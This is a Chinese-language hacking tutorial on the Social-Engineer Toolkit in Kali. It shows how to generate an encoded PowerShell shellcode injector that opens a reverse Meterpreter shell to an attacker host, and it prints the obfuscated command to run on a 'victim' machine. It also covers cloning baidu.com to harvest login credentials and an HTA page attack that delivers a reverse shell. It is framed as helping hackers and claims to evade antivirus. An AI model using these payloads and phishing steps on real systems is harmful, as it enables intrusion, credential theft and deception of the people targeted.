社会工程学(Social Engineering)简称社工，其通过分析攻击对象的心理弱点，利用人性的本能反应，以及任何好奇心，贪婪等心理特征进行的，使用诸如假冒，欺骗，引诱等多种手段来达成攻击目标的一种手段，社会工程学的应用领域非常之广泛，而很多黑客也会将社工运用到渗透的方方面面，社工也被称为没有技术，却比技术更强大的渗透方式，正所谓 “攻城为下，攻心为上” 这句话用在社工上面是最恰当不过的啦。

接下来将介绍一个工具，社会工程工具包(SEToolkit)工具，该工具由 David Kennedy (ReL1K)设计并开发，并且有一群活跃的社区合作进行维护工作(www.social-engineer.org),该工具包是开源的并使用Python作为开发语言，其主要目的是协助黑客更好的进行社工活动。

PowerShell 注入攻击

社工工具包中包含一个PowerShell注入攻击的有效载荷，适用于 Win7 - Win10系统使用，因为PowerShell脚本可以很容易的将ShellCode注入到目标的物理内存中，使用该载荷攻击不会触发病毒报警。

1.Kali系统中默认安装了SEToolkit工具，我们只需要运行该工具，然后从主菜单选择 1) Social-Engineering。

root@kali:~#  setoolkitSelect from the menu:1) Social-Engineering Attacks2) Penetration Testing (Fast-Track)3) Third Party Modules4) Update the Social-Engineer Toolkit5) Update SET configuration6) Help, Credits, and About99) Exit the Social-Engineer Toolkitset>  1

2.然后在选择下一级菜单中的 9) PowerShell Attack Vectors。

Select from the menu:1) Spear-Phishing Attack Vectors2) Website Attack Vectors3) Infectious Media Generator4) Create a Payload and Listener5) Mass Mailer Attack6) Arduino-Based Attack Vector7) Wireless Access Point Attack Vector8) QRCode Generator Attack Vector9) Powershell Attack Vectors10) SMS Spoofing Attack Vector11) Third Party Modules99) Return back to the main menu.set> 9

3.接着我们选择第一个选项，Powershell Alphanumeric Shellcode Injector

1) Powershell Alphanumeric Shellcode Injector2) Powershell Reverse Shell3) Powershell Bind Shell4) Powershell Dump SAM Database99) Return to Main Menuset:powershell> 1

4.首先设置好本机的IP地址，我这里是 192.168.1.40 然后等待生成PowerShell脚本，默认放在 /root/.set/reports/powershell/路径下，我们复制里面的内容。

Enter the IPAddress or DNS name for the reverse host: 192.168.1.40
set:powershell> Enter the port for the reverse [443]:
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
[*] Generating x86-based powershell injection code...
[*] Reverse_HTTPS takes a few seconds to calculate..One moment..
No encoder or badchars specified, outputting raw payload
Payload size: 380 bytes
Final size of c file: 1622 bytes[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : yes

5.通过各种途径，在被害主机上面执行这一段ShellCode代码。

powershell -w 1 -C "sv i -;sv pz ec;sv YD ((gv i).value.toString()+(gv pz).value.toString());powershell (gv YD).value.toString() 'JABOAHgAIAA9ACAAJwAkAEsAcwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAa'"

6.回到Kali，会发现出现了一个会话，使用 sessions -i 查询，上线成功！

msf5 exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.1.2; (UUID: skqutxoz) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (192.168.1.40:443 -> 192.168.1.2:64014) at 2019-08-14 12:29:21 +0800msf5 exploit(multi/handler) > sessions -iActive sessions
===============Id  Name  Type                     Information                                Connection--  ----  ----                     -----------                                ----------1         meterpreter x86/windows  DESKTOP @ DESKTOP  192.168.1.40:443 -> 192.168.1.2:64014 (192.168.1.2)msf5 exploit(multi/handler) >

SEToolkit 站点克隆

1. SEToolkit 还支持站点克隆首先选择，1)Social-Engineering Attacks

Select from the menu:1) Social-Engineering Attacks2) Penetration Testing (Fast-Track)3) Third Party Modules4) Update the Social-Engineer Toolkit5) Update SET configuration6) Help, Credits, and About99) Exit the Social-Engineer Toolkitset> 1

2.接着选择，2)Website Attack Vectors

Select from the menu:1) Spear-Phishing Attack Vectors2) Website Attack Vectors3) Infectious Media Generator4) Create a Payload and Listener5) Mass Mailer Attack6) Arduino-Based Attack Vector7) Wireless Access Point Attack Vector8) QRCode Generator Attack Vector9) Powershell Attack Vectors10) SMS Spoofing Attack Vector11) Third Party Modules99) Return back to the main menu.set> 2

1. 选择 3)Credential Harvester Attack Method

1) Java Applet Attack Method2) Metasploit Browser Exploit Method3) Credential Harvester Attack Method4) Tabnabbing Attack Method5) Web Jacking Attack Method6) Multi-Attack Web Method7) Full Screen Attack Method8) HTA Attack Method99) Return to Main Menuset:webattack>3

4.这里会有三个选项，第一个是使用系统自带的模板，第二个是克隆一个页面，第三个是自定义页面，此处选择2，并输入待克隆页面。

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.40]:192.168.1.40
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com[*] Cloning the website: http://www.baidu.com
[*] This could take a little bit...The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache or NGINX?
Do you want to attempt to disable Apache? [y/n]: y
[ ok ] Stopping apache2 (via systemctl): apache2.service.
[ ok ] Stopping nginx (via systemctl): nginx.service.
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.

SEToolkit HTA 注入攻击

HTA shell注入攻击，生成一个克隆页面，当用户点击运行脚本的时候，会触发反弹一个Shell。

1.根据上方的步骤，重新运行SEToolkit工具然后选择，1)Social-Engineering Attacks

Select from the menu:1) Social-Engineering Attacks2) Penetration Testing (Fast-Track)3) Third Party Modules4) Update the Social-Engineer Toolkit5) Update SET configuration6) Help, Credits, and About99) Exit the Social-Engineer Toolkitset> 1

2.选择 2)Website Attack Vectors

Select from the menu:1) Spear-Phishing Attack Vectors2) Website Attack Vectors3) Infectious Media Generator4) Create a Payload and Listener5) Mass Mailer Attack6) Arduino-Based Attack Vector7) Wireless Access Point Attack Vector8) QRCode Generator Attack Vector9) Powershell Attack Vectors10) SMS Spoofing Attack Vector11) Third Party Modules99) Return back to the main menu.set> 2

3.选择 8)HTA Attack Method

1) Java Applet Attack Method2) Metasploit Browser Exploit Method3) Credential Harvester Attack Method4) Tabnabbing Attack Method5) Web Jacking Attack Method6) Multi-Attack Web Method7) Full Screen Attack Method8) HTA Attack Method99) Return to Main Menuset:webattack>8

4.选择 2)Site Cloner，克隆一个站点，然后选择一个攻击载荷，Meterpreter Reverse TCP

1) Web Templates2) Site Cloner3) Custom Import99) Return to Webattack Menuset:webattack>2
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.baidu.com
[*] HTA Attack Vector selected. Enter your IP, Port, and Payload...
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.40]:
Enter the port for the reverse payload [443]:
Select the payload you want to deliver:1. Meterpreter Reverse HTTPS2. Meterpreter Reverse HTTP3. Meterpreter Reverse TCPEnter the payload number [1-3]: 3

5.用户点击页面，运行脚本以后，成功反弹Shell。